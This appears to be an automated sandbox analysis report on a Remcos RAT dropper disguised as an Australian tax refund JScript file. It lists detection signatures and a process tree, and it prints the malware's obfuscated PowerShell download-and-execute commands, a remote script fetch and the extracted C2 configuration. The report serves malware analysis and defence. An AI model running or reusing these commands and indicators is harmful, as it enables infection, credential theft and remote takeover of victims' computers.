Edit tour
Windows
Analysis Report
Tax_Refund_Claim_2024_Australian_Taxation_Office.js
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7296 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Tax_R efund_Clai m_2024_Aus tralian_Ta xation_Off ice.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7356 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " if ($null -ne $PSVer sionTable -and $PSVe rsionTable .PSVersion -ne $null ) { [void] $PSVersion Table.PSVe rsion } el se { Write -Output 'P owerShell version No t availabl e' };if ($ null -ne $ PSVersionT able -and $PSVersion Table.PSVe rsion -ne $null) { [ void]$PSVe rsionTable .PSVersion } else { Write-Outp ut 'PowerS hell versi on Not ava ilable' }; $originalT ext = '0/L ucV5/d/ee. e#sap//:sp ##h';$rest oredText = $original Text -repl ace '#', ' t';$iLnBGe oOpffqoUAK mlhR = 'ht tps://res. cloudinary .com/dnkr4 s5yg/image /upload/v1 735420882/ givvuo2kat k3jnggipgn .jpg ';$Wh ccGUizbJWa NhoCLZCL = New-Objec t System.N et.WebClie nt;$NGKHbm bLgczBefhf OAGi = $Wh ccGUizbJWa NhoCLZCL.D ownloadDat a($iLnBGeo OpffqoUAKm lhR);$Kodp fKtodcZPWk kULGWU = [ System.Tex t.Encoding ]::UTF8.Ge tString($N GKHbmbLgcz BefhfOAGi) ;$kQbJzINb GPimbikLeL WW = '<<BA SE64_START >>';$KNIAG gPKpufLIac bNxjH = '< <BASE64_EN D>>';$txWW UeAUmepGGo aWUeCB = $ KodpfKtodc ZPWkkULGWU .IndexOf($ kQbJzINbGP imbikLeLWW );$TPWfGTA fLfnGqWLfp iIW = $Kod pfKtodcZPW kkULGWU.In dexOf($KNI AGgPKpufLI acbNxjH);$ txWWUeAUme pGGoaWUeCB -ge 0 -an d $TPWfGTA fLfnGqWLfp iIW -gt $t xWWUeAUmep GGoaWUeCB; $txWWUeAUm epGGoaWUeC B += $kQbJ zINbGPimbi kLeLWW.Len gth;$Uoiil KJdRANLoPp nucKc = $T PWfGTAfLfn GqWLfpiIW - $txWWUeA UmepGGoaWU eCB;$HhBCj WCWcOAOGas dihln = $K odpfKtodcZ PWkkULGWU. Substring( $txWWUeAUm epGGoaWUeC B, $UoiilK JdRANLoPpn ucKc);$OOi PlmOGWcLpO BNCiWdR = -join ($Hh BCjWCWcOAO Gasdihln.T oCharArray () | ForEa ch-Object { $_ })[-1 ..-($HhBCj WCWcOAOGas dihln.Leng th)];$NmLo UkntiBnWiQ rtLteW = [ System.Con vert]::Fro mBase64Str ing($OOiPl mOGWcLpOBN CiWdR);$Qp quWoUGdWWl lhPbBgox = [System.R eflection. Assembly]: :Load($NmL oUkntiBnWi QrtLteW);$ qUzNNPuWfs NLioKiONSx = [dnlib. IO.Home].G etMethod(' VAI');$qUz NNPuWfsNLi oKiONSx.In voke($null , @($resto redText, ' 1', 'hpiCi WTCNopizuW aGzCt', 'h piCiWTCNop izuWaGzCt' , 'MSBuild ', 'hpiCiW TCNopizuWa GzCt','hpi CiWTCNopiz uWaGzCt',' 1','https: //102.175. 153.160.ho st.secures erver.net/ file.js', 'C:\\Progr amData','s mudgy','js ','5','hpi CiWTCNopiz uWaGzCt',' TaskName') );if ($nul l -ne $PSV ersionTabl e -and $PS VersionTab le.PSVersi on -ne $nu ll) { [voi d]$PSVersi onTable.PS Version } else { Wri te-Output 'PowerShel l version Not availa ble' };if ($null -ne $PSVersio nTable -an d $PSVersi onTable.PS Version -n e $null) { [void]$PS VersionTab le.PSVersi on } else { Write-Ou tput 'Powe rShell ver sion Not a vailable' };" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7740 cmdline:
"C:\Window s\System32 \cmd.exe" /C copy *. vbs "hpiCi WTCNopizuW aGzCt\hpiC iWTCNopizu WaGzCt.vbs " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - MSBuild.exe (PID: 7912 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - chrome.exe (PID: 8092 cmdline:
--user-dat a-dir=C:\U sers\user\ AppData\Lo cal\Temp\T mpUserData --window- position=- 2400,-2400 --remote- debugging- port=9222 --profile- directory= "Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - MSBuild.exe (PID: 8152 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\MSBu ild.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\y qrnzxuewrl lgkpigkbso oiasehxvvu nub" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - MSBuild.exe (PID: 8160 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\MSBu ild.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\a kwgap" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - MSBuild.exe (PID: 8184 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\MSBu ild.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\l mkqsiyzy" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - MSBuild.exe (PID: 600 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\MSBu ild.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\l mkqsiyzy" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - msedge.exe (PID: 7376 cmdline:
--user-dat a-dir=C:\U sers\user\ AppData\Lo cal\Temp\T mpUserData --window- position=- 2400,-2400 --remote- debugging- port=9222 --profile- directory= "Default" MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 5252 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=24 80 --field -trial-han dle=2084,i ,136620398 097456378, 9057800673 115670366, 262144 /pr efetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 2656 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6484 --fie ld-trial-h andle=2084 ,i,1366203 9809745637 8,90578006 7311567036 6,262144 / prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 3796 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6796 --field-t rial-handl e=2084,i,1 3662039809 7456378,90 5780067311 5670366,26 2144 /pref etch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- powershell.exe (PID: 7796 cmdline:
powershell .exe -NoPr ofile -Exe cutionPoli cy Bypass -WindowSty le Hidden -Command " Invoke-Web Request -U ri 'https: //102.175. 153.160.ho st.secures erver.net/ file.js' - OutFile 'C :\\Program Data\smudg y.js'; Sta rt-Process 'C:\\Prog ramData\sm udgy.js'" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 3652 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ smudgy.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6036 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " if ($null -ne $PSVer sionTable -and $PSVe rsionTable .PSVersion -ne $null ) { [void] $PSVersion Table.PSVe rsion } el se { Write -Output 'P owerShell version No t availabl e' };if ($ null -ne $ PSVersionT able -and $PSVersion Table.PSVe rsion -ne $null) { [ void]$PSVe rsionTable .PSVersion } else { Write-Outp ut 'PowerS hell versi on Not ava ilable' }; $originalT ext = '0/L ucV5/d/ee. e#sap//:sp ##h';$rest oredText = $original Text -repl ace '#', ' t';$iLbCTN CSacaUBlzn KdLL = 'ht tps://res. cloudinary .com/dnkr4 s5yg/image /upload/v1 735420882/ givvuo2kat k3jnggipgn .jpg ';$BA KhKaLKKhUz WAiLoPeT = New-Objec t System.N et.WebClie nt;$CUcWoi OZbZlLkKfk LNKn = $BA KhKaLKKhUz WAiLoPeT.D ownloadDat a($iLbCTNC SacaUBlznK dLL);$hnbc LZWZIRphWi rWbKoP = [ System.Tex t.Encoding ]::UTF8.Ge tString($C UcWoiOZbZl LkKfkLNKn) ;$WdhGWGnC uzIoSWNGza kW = '<<BA SE64_START >>';$IiaPz GlWLWAWULk dGasx = '< <BASE64_EN D>>';$oiGG vTReStQZLh KLLBWJ = $ hnbcLZWZIR phWirWbKoP .IndexOf($ WdhGWGnCuz IoSWNGzakW );$LcWLWIW LKiPfApOLg bhR = $hnb cLZWZIRphW irWbKoP.In dexOf($Iia PzGlWLWAWU LkdGasx);$ oiGGvTReSt QZLhKLLBWJ -ge 0 -an d $LcWLWIW LKiPfApOLg bhR -gt $o iGGvTReStQ ZLhKLLBWJ; $oiGGvTReS tQZLhKLLBW J += $WdhG WGnCuzIoSW NGzakW.Len gth;$khUWO GOLPuNkKWu NlJGL = $L cWLWIWLKiP fApOLgbhR - $oiGGvTR eStQZLhKLL BWJ;$vZCZR hsdWpmjLCU emdQR = $h nbcLZWZIRp hWirWbKoP. Substring( $oiGGvTReS tQZLhKLLBW J, $khUWOG OLPuNkKWuN lJGL);$sHP bLeLWLSAKZ kdaLmxt = -join ($vZ CZRhsdWpmj LCUemdQR.T oCharArray () | ForEa ch-Object { $_ })[-1 ..-($vZCZR hsdWpmjLCU emdQR.Leng th)];$AlkL oWLeqkLxkm viBqWi = [ System.Con vert]::Fro mBase64Str ing($sHPbL eLWLSAKZkd aLmxt);$Wx LPHeKiGUIn biBzcbRa = [System.R eflection. Assembly]: :Load($Alk LoWLeqkLxk mviBqWi);$ OLiclpBLBa WWdiULbLvU = [dnlib. IO.Home].G etMethod(' VAI');$OLi clpBLBaWWd iULbLvU.In voke($null , @($resto redText, ' kSUPzeWAKq sWhWRWCogL ', 'kSUPze WAKqsWhWRW CogL', 'kS UPzeWAKqsW hWRWCogL', 'MSBuild' , 'kSUPzeW AKqsWhWRWC ogL', 'kSU PzeWAKqsWh WRWCogL',' kSUPzeWAKq sWhWRWCogL ','kSUPzeW AKqsWhWRWC ogL','kSUP zeWAKqsWhW RWCogL','k SUPzeWAKqs WhWRWCogL' ,'kSUPzeWA KqsWhWRWCo gL','1','k SUPzeWAKqs WhWRWCogL' ,'TaskName '));if ($n ull -ne $P SVersionTa ble -and $ PSVersionT able.PSVer sion -ne $ null) { [v oid]$PSVer sionTable. PSVersion } else { W rite-Outpu t 'PowerSh ell versio n Not avai lable' };i f ($null - ne $PSVers ionTable - and $PSVer sionTable. PSVersion -ne $null) { [void]$ PSVersionT able.PSVer sion } els e { Write- Output 'Po werShell v ersion Not available ' };" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - MSBuild.exe (PID: 8796 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - MSBuild.exe (PID: 8804 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- svchost.exe (PID: 7556 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 7 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |